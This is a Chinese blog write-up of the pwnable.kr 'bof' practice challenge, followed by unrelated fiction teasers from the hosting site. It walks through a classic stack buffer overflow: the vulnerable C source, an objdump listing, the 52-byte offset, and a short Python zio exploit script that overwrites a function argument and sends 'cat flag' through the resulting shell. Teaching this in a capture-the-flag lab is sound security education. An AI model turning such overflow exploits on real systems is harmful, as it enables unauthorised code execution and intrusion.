pwnable.kr [Toddler's Bottle] - bof

Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

簡單的棧溢出練習(xí)。
源碼如下：

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

這里需要構(gòu)造棧溢出，淹沒至前一個棧幀的當(dāng)前函數(shù)的參數(shù)位置。
linux下可以借助gdb進行動態(tài)調(diào)試疗隶，利用objdump進行靜態(tài)反編譯番官。
這里可使用objdump來靜態(tài)查看棧分配情況objdump -d bof：
由題設(shè)只需關(guān)注main()和func()

0000062c <func>:
 62c:   55                      push   %ebp
 62d:   89 e5                   mov    %esp,%ebp
 62f:   83 ec 48                sub    $0x48,%esp
 632:   65 a1 14 00 00 00       mov    %gs:0x14,%eax
 638:   89 45 f4                mov    %eax,-0xc(%ebp)
 63b:   31 c0                   xor    %eax,%eax
 63d:   c7 04 24 8c 07 00 00    movl   $0x78c,(%esp)
 644:   e8 fc ff ff ff          call   645 <func+0x19>   ; call printf()
 649:   8d 45 d4                lea    -0x2c(%ebp),%eax  ; char[32] -- offset to ebp
 64c:   89 04 24                mov    %eax,(%esp)       ; 傳參
 64f:   e8 fc ff ff ff          call   650 <func+0x24>   ; call gets()
 654:   81 7d 08 be ba fe ca    cmpl   $0xcafebabe,0x8(%ebp)
 65b:   75 0e                   jne    66b <func+0x3f>
 65d:   c7 04 24 9b 07 00 00    movl   $0x79b,(%esp)
 664:   e8 fc ff ff ff          call   665 <func+0x39>
 669:   eb 0c                   jmp    677 <func+0x4b>
 66b:   c7 04 24 a3 07 00 00    movl   $0x7a3,(%esp)
 672:   e8 fc ff ff ff          call   673 <func+0x47>
 677:   8b 45 f4                mov    -0xc(%ebp),%eax
 67a:   65 33 05 14 00 00 00    xor    %gs:0x14,%eax
 681:   74 05                   je     688 <func+0x5c>
 683:   e8 fc ff ff ff          call   684 <func+0x58>
 688:   c9                      leave  
 689:   c3                      ret    

0000068a <main>:
 68a:   55                      push   %ebp
 68b:   89 e5                   mov    %esp,%ebp
 68d:   83 e4 f0                and    $0xfffffff0,%esp
 690:   83 ec 10                sub    $0x10,%esp
 693:   c7 04 24 ef be ad de    movl   $0xdeadbeef,(%esp)
 69a:   e8 8d ff ff ff          call   62c <func>
 69f:   b8 00 00 00 00          mov    $0x0,%eax
 6a4:   c9                      leave  
 6a5:   c3                      ret    
 6a6:   90                      nop

可以發(fā)現(xiàn) char overflowme[32] 在當(dāng)前棧幀中距離EBP的偏移為0x2c扯再，即44梨熙，再加上ESP的4，返回地址的4殴蹄，即從局部變量overflowme首地址52byte的位置即為當(dāng)前函數(shù)的參數(shù)key的地址。
借助python庫zio（an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.）寫腳本跑出flag猾担。

from zio import *
host = "pwnable.kr" #143.248.249.64
port = 9000
io = zio((host, port), print_read=False, print_write=False)
payload = "a"*52 + "\xbe\xba\xfe\xca" + "\n"
io.write(payload+"\n")
io.write("cat flag\n")
buf = io.read_until("\n")
print buf

$ python run.py
daddy, I just pwned a buFFer :)

最后編輯于：2017.12.08 03:41:27

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末袭灯，一起剝皮案震驚了整個濱河市，隨后出現(xiàn)的幾起案子绑嘹，更是在濱河造成了極大的恐慌稽荧，老刑警劉巖，帶你破解...
沈念sama閱讀 212,029評論 6贊 492
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件圾叼，死亡現(xiàn)場離奇詭異蛤克，居然都是意外死亡，警方通過查閱死者的電腦和手機夷蚊，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 90,395評論 3贊 385
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進店門构挤，熙熙樓的掌柜王于貴愁眉苦臉地迎上來，“玉大人惕鼓，你說我怎么就攤上這事筋现。” “怎么了箱歧？”我有些...
開封第一講書人閱讀 157,570評論 0贊 348
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵矾飞，是天一觀的道長。經(jīng)常有香客問我呀邢，道長洒沦，這世上最難降的妖魔是什么？我笑而不...
開封第一講書人閱讀 56,535評論 1贊 284
?港島之戀（遺憾婚禮）
正文為了忘掉前任价淌，我火速辦了婚禮申眼，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘蝉衣。我一直安慰自己括尸，他們只是感情好，可當(dāng)我...
茶點故事閱讀 65,650評論 6贊 386
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布病毡。她就那樣靜靜地躺著濒翻，像睡著了一般。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上有送，一...
開封第一講書人閱讀 49,850評論 1贊 290
城市分裂傳說
那天淌喻，我揣著相機與錄音，去河邊找鬼娶眷。笑死似嗤，一個胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的届宠。我是一名探鬼主播烁落，決...
沈念sama閱讀 39,006評論 3贊 408
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼，長吁一口氣：“原來是場噩夢啊……” “哼豌注！你這毒婦竟也來了伤塌？” 一聲冷哼從身側(cè)響起，我...
開封第一講書人閱讀 37,747評論 0贊 268
萬榮殺人案實錄
序言：老撾萬榮一對情侶失蹤轧铁，失蹤者是張志新（化名）和其女友劉穎每聪，沒想到半個月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體齿风，經(jīng)...
沈念sama閱讀 44,207評論 1贊 303
?護林員之死
正文獨居荒郊野嶺守林人離奇死亡药薯，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點故事閱讀 36,536評論 2贊 327
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時候發(fā)現(xiàn)自己被綠了救斑。大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片童本。...
茶點故事閱讀 38,683評論 1贊 341
活死人
序言：一個原本活蹦亂跳的男人離奇死亡，死狀恐怖脸候，靈堂內(nèi)的尸體忽然破棺而出穷娱，到底是詐尸還是另有隱情，我是刑警寧澤运沦，帶...
沈念sama閱讀 34,342評論 4贊 330
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布泵额，位于F島的核電站，受9級特大地震影響携添，放射性物質(zhì)發(fā)生泄漏嫁盲。R本人自食惡果不足惜，卻給世界環(huán)境...
茶點故事閱讀 39,964評論 3贊 315
男人毒藥：我在死后第九天來索命
文/蒙蒙一烈掠、第九天我趴在偏房一處隱蔽的房頂上張望羞秤。院中可真熱鬧，春花似錦向叉、人聲如沸锥腻。這莊子的主人今日做“春日...
開封第一講書人閱讀 30,772評論 0贊 21
一樁弒父案母谎，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽。三九已至京革，卻和暖如春奇唤，著一層夾襖步出監(jiān)牢的瞬間幸斥，已是汗流浹背。一陣腳步聲響...
開封第一講書人閱讀 32,004評論 1贊 266
情欲美人皮
我被黑心中介騙來泰國打工咬扇，沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留甲葬，地道東北人。一個月前我還...
沈念sama閱讀 46,401評論 2贊 360
代替公主和親
正文我出身青樓懈贺，卻偏偏與公主長得像经窖，于是被迫代替她去往敵國和親。傳聞我的和親對象是個殘疾皇子梭灿，可洞房花燭夜當(dāng)晚...
茶點故事閱讀 43,566評論 2贊 349

pwnable.kr [Toddler's Bottle] - bof

推薦閱讀更多精彩內(nèi)容